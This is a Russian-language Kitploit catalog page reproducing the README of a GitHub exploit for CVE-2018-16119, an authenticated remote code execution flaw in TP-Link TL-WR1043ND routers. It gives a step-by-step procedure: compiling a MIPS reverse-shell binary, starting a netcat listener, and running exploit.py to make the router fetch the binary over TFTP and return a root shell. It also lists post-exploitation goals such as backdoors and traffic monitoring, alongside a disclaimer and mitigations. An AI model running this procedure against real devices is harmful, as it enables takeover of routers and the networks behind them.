Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-16119 — TP-Link TL-WR1043ND - Аутентифицированное удаленное выполнение кода | Kitploit
Инструменты/GitHubGitHub/hdbreaker/cve-2018-16119
Безопасность встроенных системБезопасность IoTЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАппаратная БезопасностьОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHubhdbreaker/cve-2018-16119

CVE-2018-16119

TP-Link TL-WR1043ND - Аутентифицированное удаленное выполнение кода

1631 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
РепозиторийСайт

CVE-2018-16119: Аутентифицированное удаленное выполнение кода в TP-Link WR1043ND

Обзор

CVE-2018-16119 — это критическая уязвимость аутентифицированного удаленного выполнения кода, затрагивающая маршрутизаторы TP-Link TL-WR1043ND. Эта уязвимость позволяет аутентифицированным злоумышленникам выполнять произвольные команды на целевом устройстве с привилегиями root, что потенциально может привести к полной компрометации системы.

Детали CVE: CVE-2018-16119

Влияние уязвимости

  • Вектор атаки: Сеть
  • Сложность атаки: Низкая
  • Необходимые привилегии: Низкие (требуется аутентификация)
  • Взаимодействие пользователя: Нет
  • Область: Изменена
  • Влияние: Полная компрометация конфиденциальности, целостности и доступности устройства

После эксплуатации злоумышленник получает root-доступ к оболочке маршрутизатора, что позволяет ему:

  • Изменять конфигурации маршрутизатора
  • Отслеживать сетевой трафик
  • Использовать устройство как точку для бокового перемещения
  • Устанавливать постоянные бэкдоры
  • Нарушать сетевое подключение

Затронутые устройства

  • TP-Link TL-WR1043ND (несколько версий прошивки)
  • Потенциально другие устройства TP-Link, использующие аналогичную прошивку

Предварительные требования

Системные требования

  • Хост с Linux и привилегиями root (требуется для TFTP-сервера на порту 69)
  • Docker (для кросс-компиляции)
  • Сетевое подключение к целевому устройству
  • Действительные учетные данные аутентификации для целевого маршрутизатора

Зависимости

root@kitploit:~
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io

Руководство по эксплуатации

Шаг 1: Компиляция полезной нагрузки обратной оболочки

Эксплойту требуется бинарный файл обратной оболочки MIPS big-endian. Выполните следующие шаги для его компиляции:

root@kitploit:~
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/

# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash

Внутри Docker-контейнера:

root@kitploit:~
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh

Выйдите из Docker и скопируйте скомпилированный бинарный файл:

root@kitploit:~
cp /tmp/shh exploit/tftp_server/

Шаг 2: Настройка слушателя обратной оболочки

Откройте терминал и запустите слушатель netcat на порту 9669:

Linux:

root@kitploit:~
nc -l -p 9669 -vv

macOS:

root@kitploit:~
nc -l 9669 -vv

Шаг 3: Запуск эксплойта

Запустите скрипт эксплойта с привилегиями root (требуется для TFTP-сервера):

root@kitploit:~
sudo python3 exploit/exploit.py

Скрипт выполнит:

  1. Аутентификацию на целевом маршрутизаторе
  2. Запуск TFTP-сервера на порту 69
  3. Эксплуатацию уязвимости для загрузки и выполнения обратной оболочки
  4. Установку обратного соединения с вашим слушателем

Шаг 4: Взаимодействие с оболочкой

После установки соединения:

  • Вы получите root-доступ к маршрутизатору
  • Изначально подробный вывод отображаться не будет
  • Просто начните вводить команды для взаимодействия с оболочкой

Структура проекта

root@kitploit:~
CVE-2018-16119/
├── exploit/
│   ├── exploit.py              # Main exploit script
│   ├── requirements.txt        # Python dependencies
│   ├── notes.txt              # Additional notes
│   └── tftp_server/
│       ├── reverse_shell_mipsbe.c  # Reverse shell source code
│       └── shh                     # Compiled MIPS binary
├── firmware/
│   └── wr740nv4_webrevert.bin     # Sample firmware
├── squashfs-root/                  # Extracted firmware filesystem
└── README.md                       # This file

Соображения безопасности

Ответственное раскрытие

Эта уязвимость была ответственно раскрыта и должна использоваться только для:

  • Авторизованного тестирования на проникновение
  • Исследований безопасности в контролируемых средах
  • Образовательных целей

Юридическое уведомление

⚠️ ПРЕДУПРЕЖДЕНИЕ: Данный эксплойт предоставляется только для образовательных и авторизованных целей тестирования. Несанкционированный доступ к компьютерным системам незаконен и неэтичен. Пользователи несут ответственность за получение соответствующих разрешений перед использованием этого инструмента.

Рекомендации по смягчению

  • Обновите прошивку до последней версии
  • Измените учетные данные администратора по умолчанию
  • Отключите удаленное управление, если оно не требуется
  • Внедрите сегментацию сети
  • Отслеживайте подозрительную сетевую активность

Зависимости

Установите зависимости Python:

root@kitploit:~
pip3 install -r exploit/requirements.txt

Устранение неполадок

Частые проблемы

Отказ в доступе к TFTP-серверу:

  • Убедитесь, что скрипт запущен с привилегиями root
  • Проверьте, что порт 69 не занят

Ошибка подключения:

  • Проверьте сетевое подключение к цели
  • Подтвердите правильность учетных данных
  • Проверьте настройки брандмауэра

Нет ответа от оболочки:

  • Оболочка может инициализироваться некоторое время
  • Попробуйте нажать Enter или ввести базовые команды, такие как id или pwd

Исследование и разработка

Это исследование демонстрирует критические недостатки безопасности в прошивке встраиваемых устройств. Уязвимость подчеркивает важность:

  • Практик безопасного программирования во встраиваемых системах
  • Регулярных аудитов безопасности устройств IoT
  • Своевременных обновлений прошивки и управления исправлениями

Ссылки

  • Официальная запись CVE-2018-16119
  • Уведомления безопасности TP-Link

Контакты и авторство

Исследователь: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi


Данное исследование проводилось в образовательных целях и для повышения безопасности встраиваемых систем. Пожалуйста, используйте ответственно.

Скачать инструмент